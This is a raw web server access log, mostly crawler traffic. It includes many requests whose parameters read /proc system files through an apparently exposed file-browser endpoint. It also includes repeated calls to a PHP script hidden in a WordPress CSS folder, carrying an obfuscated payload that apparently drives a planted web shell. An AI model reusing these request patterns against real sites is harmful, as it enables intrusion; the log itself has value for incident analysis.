74.7.227.128 - - [05/Nov/2025:21:14:13 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/conf/lo/forwarding&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2518 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:12:12 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335353533322p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335313933322q3935366263656564343963626438353031353662383166383634356538396161222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:14:17 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/conf/lo/secure_redirects&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2518 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:14:24 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/lo/forwarding&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2518 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:14:29 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/conf/lo/mc_forwarding&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2522 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:12:35 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335353535352p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335313935352q6139306364636562666332363833396532626666366238346234326130376337222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:14:35 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/lo/mc_forwarding&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2522 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:14:39 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/conf/lo/shared_media&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2515 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:14:46 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/conf/lo/proxy_arp_pvlan&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2522 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:14:49 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/conf/lo/src_valid_mark&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2521 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:14:52 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/lo/medium_id&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2516 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:12:57 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335353537372p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335313937372q3730346562363534326134653863386534386339643039383064363064613963222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:14:59 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/lo/arp_ignore&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2516 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
57.141.14.31 - - [05/Nov/2025:21:14:58 +0700] "GET /sitemap-subitem-927.xml HTTP/2" 200 182330 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.14.54 - - [05/Nov/2025:21:15:00 +0700] "GET /shopbrand1137408097?kg=1134930542 HTTP/2" 200 62523 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
74.7.227.128 - - [05/Nov/2025:21:15:02 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/lo/accept_source_route&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2523 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:15:06 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/conf/lo/force_igmp_version&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2523 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:15:12 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/lo/disable_xfrm&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2515 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:15:16 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/lo/proxy_arp&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2517 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:13:20 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335353630302p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335323030302q6238343066393035656235386635363334626566373264393136313932383333222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:15:20 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/conf/lo/disable_xfrm&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2515 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:15:23 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/lo/src_valid_mark&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2521 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:15:30 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/conf/lo/arp_ignore&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2516 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:15:33 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/lo/route_localnet&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2519 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:15:36 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/conf/lo/medium_id&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2516 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:15:39 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/lo/proxy_arp_pvlan&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2522 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:13:42 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335353632322p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335323032322q3233353065353536343838653330306466643534336665613362626536653663222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
66.249.71.4 - - [05/Nov/2025:21:15:44 +0700] "GET /shopbrand561700476?kg=0560477186 HTTP/1.1" 200 26197 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.128 - - [05/Nov/2025:21:15:46 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/conf/lo/log_martians&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2517 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:15:49 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/conf/lo/disable_policy&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2517 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:15:52 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/lo/force_igmp_version&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2523 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:15:55 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/netfilter/nf_log/0&path=//proc/sys/net/netfilter/nf_log HTTP/2" 200 2510 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:16:02 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/lo/disable_policy&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2517 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:14:04 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335353634342p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335323034342q6637373632663838366330633135393266383563393963376532363864646431222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:16:06 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/lo/shared_media&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2515 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:16:11 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/lo/log_martians&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2517 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:16:17 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/default/route_localnet&path=//proc/sys/net/ipv4/conf/default HTTP/2" 200 2531 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:16:21 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/default/disable_xfrm&path=//proc/sys/net/ipv4/conf/default HTTP/2" 200 2528 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:14:26 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335353636362p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335323036362q3531333932643463376233313739663833383763613866333363366634353331222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:16:28 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/default/accept_redirects&path=//proc/sys/net/ipv4/conf/default HTTP/2" 200 2528 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:16:31 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/default/arp_notify&path=//proc/sys/net/ipv4/conf/default HTTP/2" 200 2527 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:16:34 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/default/accept_local&path=//proc/sys/net/ipv4/conf/default HTTP/2" 200 2527 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:16:41 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/default/bootp_relay&path=//proc/sys/net/ipv4/conf/default HTTP/2" 200 2526 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:16:46 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/default/arp_filter&path=//proc/sys/net/ipv4/conf/default HTTP/2" 200 2525 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
173.252.70.13 - - [05/Nov/2025:21:16:48 +0700] "GET /robots.txt HTTP/2" 206 90 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
103.7.226.137 - - [05/Nov/2025:21:14:48 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335353638382p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335323038382q3137333432613765393836623536623332343964646561383766323931396132222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:16:53 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/default/arp_accept&path=//proc/sys/net/ipv4/conf/default HTTP/2" 200 2526 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:16:56 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/default/accept_source_route&path=//proc/sys/net/ipv4/conf/default HTTP/2" 200 2533 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:17:01 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/default/secure_redirects&path=//proc/sys/net/ipv4/conf/default HTTP/2" 200 2530 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:17:07 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/default/promote_secondaries&path=//proc/sys/net/ipv4/conf/default HTTP/2" 200 2530 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:15:10 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335353731302p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335323131302q6130313033623665343265373037333531643838386535643633366362626266222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:17:13 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/default/arp_announce&path=//proc/sys/net/ipv4/conf/default HTTP/2" 200 2527 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:17:17 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/default/send_redirects&path=//proc/sys/net/ipv4/conf/default HTTP/2" 200 2531 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:17:20 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/default/log_martians&path=//proc/sys/net/ipv4/conf/default HTTP/2" 200 2527 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.71.4 - - [05/Nov/2025:21:17:24 +0700] "GET /shopbrand52467559?kg=0052353710 HTTP/1.1" 200 24409 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.128 - - [05/Nov/2025:21:17:27 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/default/disable_policy&path=//proc/sys/net/ipv4/conf/default HTTP/2" 200 2529 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:17:32 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/default/force_igmp_version&path=//proc/sys/net/ipv4/conf/default HTTP/2" 200 2532 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:15:32 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335353733322p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335323133322q3966303265646537653061323931343466323735643736386566653837613331222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:17:38 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/default/proxy_arp_pvlan&path=//proc/sys/net/ipv4/conf/default HTTP/2" 200 2533 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:17:43 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/default/shared_media&path=//proc/sys/net/ipv4/conf/default HTTP/2" 200 2528 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:17:46 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/default/forwarding&path=//proc/sys/net/ipv4/conf/default HTTP/2" 200 2526 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:17:52 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/default/medium_id&path=//proc/sys/net/ipv4/conf/default HTTP/2" 200 2525 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:15:54 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335353735342p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335323135342q6666376338316131373961343630656363616634383035653365306366656130222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:17:56 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/default/proxy_arp&path=//proc/sys/net/ipv4/conf/default HTTP/2" 200 2528 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:17:59 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/default/arp_ignore&path=//proc/sys/net/ipv4/conf/default HTTP/2" 200 2528 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:18:05 +0700] "GET /shopbrand557860470?path=//proc/sys/net/ipv6/conf/default HTTP/2" 200 3920 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:18:09 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/lo/tag&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2512 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:18:11 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/conf/lo/tag&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2512 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:16:16 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335353737362p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335323137362q3436363463366263333832646633656432396232636235373338323565353864222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:18:18 +0700] "GET /shopbrand557860470?path=//proc/sys/net/ipv6/conf/lo HTTP/2" 200 3834 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:18:22 +0700] "GET /shopbrand557860470?path=//run/dbus HTTP/2" 200 2538 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:18:28 +0700] "GET /shopbrand557852348?path=//proc/sys/net/ipv4/neigh HTTP/2" 200 2912 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:18:32 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv6/conf/default/temp_prefered_lft&path=//proc/sys/net/ipv6/conf/default HTTP/2" 200 2536 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:18:36 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv6/conf/default/regen_max_retry&path=//proc/sys/net/ipv6/conf/default HTTP/2" 200 2529 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:16:38 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335353739382p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335323139382q3631636439303063323930333637303266653836383038326339663638336138222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:18:42 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv6/conf/lo/ndisc_notify&path=//proc/sys/net/ipv6/conf/lo HTTP/2" 200 2516 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
